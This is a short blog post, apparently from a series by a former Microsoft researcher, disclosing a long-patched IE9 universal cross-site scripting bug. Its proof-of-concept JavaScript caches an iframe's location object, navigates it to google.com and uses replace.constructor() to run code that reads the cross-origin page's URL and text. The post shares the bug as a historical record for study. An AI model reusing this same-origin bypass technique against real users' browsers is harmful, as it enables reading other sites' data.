IE9 UXSS: Getting Function Constructor from a Cached location.replace

Caching the location object of a same-origin IFrame, redirecting it cross-origin, and then calling .replace.constructor() on the cached location object gave access to the Function constructor of the new cross-origin document. Code created through that constructor executed in the cross-origin context.

var xLocation = ifr.location;
ifr.location.href = "http://www.google.com";
// After navigation:
xLocation.replace.constructor(
    "alert(document.URL + '\\n\\n' + document.body.innerText)"
)();

The location.replace method reference survived the cross-origin navigation. Accessing .constructor on a native function normally returns the Function constructor of the originating context. In this case that context was the new cross-origin document, so the constructed function ran with access to Google’s DOM.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 UXSS: Overriding Window Methods or Getting Function via Constructor] :: [IE9 UXSS: Reading Non-HTML IFrame Content from an Inline Event Handler] >